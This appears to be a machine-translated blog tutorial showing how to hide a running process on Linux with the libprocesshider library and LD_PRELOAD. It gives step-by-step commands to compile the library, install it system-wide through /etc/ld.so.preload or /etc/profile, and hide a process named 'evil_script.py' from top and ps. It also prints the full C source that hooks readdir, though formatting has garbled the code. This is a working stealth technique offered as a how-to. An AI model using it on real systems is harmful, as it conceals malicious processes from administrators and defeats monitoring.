Shulou(Shulou.com)06/02 Report--

Preface

1. The tools used in this article can be downloaded from https://github.com/gianlucaborello/libprocesshider

two。 The idea is to use LD_PRELOAD to hijack system functions.

What is LD_PRELOAD:

LD_PRELOAD is an environment variable of the Linux system, which can affect the run-time Runtime linker of the program. It allows you to define dynamic link libraries that are loaded first before the program runs. This function is mainly used to selectively load the same functions in different dynamic link libraries. Through this environment variable, we can load other dynamic link libraries between the main program and its dynamic link library, or even overwrite the normal function library. On the one hand, we can use our own or better functions (without other people's source code) with this function, and on the other hand, we can also achieve specific goals by injecting programs into other people's programs.

Realize

1. Download program compilation

Bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.gitCloning into 'libprocesshider'...remote: Counting objects: 26, done.remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26Unpacking objects: 100% (26 Wall), done.bmfxgkpt-yhd:~# cd libprocesshider/bmfxgkpt-yhd:~/libprocesshider# makegcc-Wall-fPIC-shared-o libprocesshider.so processhider.c-ldlbmfxgkpt-yhd:~/libprocesshider#

two。 Move the file to the / usr/local/lib/ directory

Mv libprocesshider.so / usr/local/lib/

3. Load it into the global dynamic connection office

Echo / usr/local/lib/libprocesshider.so > > / etc/ld.so.preload

test

1. We run evil_script.py

two。 At this point, I found that evil_script.py could not be found in both top and ps.

At this point, we found that cpu 100%, but could not find any programs that took up a high level of cpu.

Analysis.

# define _ GNU_SOURCE#include # include / * * Every process with this name will be excluded * / static const char* process_to_filter = "evil_script.py"; / * * Get a directory name given a DIR* handle * / static int get_dir_name (DIR* dirp, char* buf, size_t size) {int fd = dirfd (dirp); if (fd =-1) {return 0;} char tmp [64] Snprintf (tmp, sizeof (tmp), "/ proc/self/fd/%d", fd); ssize_t ret = readlink (tmp, buf, size); if (ret =-1) {return 0;} buf [ret] = 0; return 1;} / * Get a process name given its pid * / static int get_process_name (char* pid, char* buf) {if (strspn (pid, "0123456789")! = strlen (pid)) {return 0 } char tmp [256]; snprintf (tmp, sizeof (tmp), "/ proc/%s/stat", pid); FILE* f = fopen (tmp, "r"); if (f = = NULL) {return 0;} if (fgets (tmp, sizeof (tmp), f) = NULL) {fclose (f); return 0;} fclose (f); int unused; sscanf (tmp, "% d (% [^)] s", & unused, buf) Return 1;} # define DECLARE_READDIR (dirent, readdir)\ static struct dirent* (* original_##readdir) (DIR*) = NULL;\ struct dirent* readdir (DIR* dirp)\ {\ if (original_##readdir = = NULL) {\ original_##readdir = dlsym (RTLD_NEXT, "readdir") \ if (original_##readdir = = NULL)\ {\ fprintf (stderr, "Error in dlsym:% s\ n", dlerror ());\}\}\ struct dirent* dir \ while (1)\ {\ dir = original_##readdir (dirp);\ if (dir) {\ char dir_name [256] \ char process_name [256] \ if (get_dir_name (dirp, dir_name, sizeof (dir_name)) & &\ strcmp (dir_name, "/ proc") = = 0 &\ get_process_name (dir- > d_name, process_name) & &\ strcmp (process_name, process_to_filter) = = 0) {\ continue \ break;\}\ return dir;\} DECLARE_READDIR (dirent64, readdir64); DECLARE_READDIR (dirent, readdir)

1. The program defines a variable process_to_filter to control which process name is not displayed

two。 Rewrite readdir

Strcmp (process_name, process_to_filter) = = 0)

When it is found that the current process name is the same as process_to_filter, continue the loop.

The pit encountered

1. In some Linux, this program cannot be compiled.

Solution method

Delete one of the last two lines

DECLARE_READDIR (dirent64, readdir64); DECLARE_READDIR (dirent, readdir)

two。 Used in some Linux

Shell echo / usr/local/lib/libprocesshider.so > > / etc/ld.so.preload will not take effect. At this point, we need to configure the environment variable shell bmfxgkpt-yhd:~# vi / etc/profile to add a line shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so.

Summary

The above is a way to hide the process and the pit encountered under the linux introduced by the editor. I hope it will be helpful to you. If you have any questions, please leave me a message and the editor will reply to you in time. Thank you very much for your support to the website!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.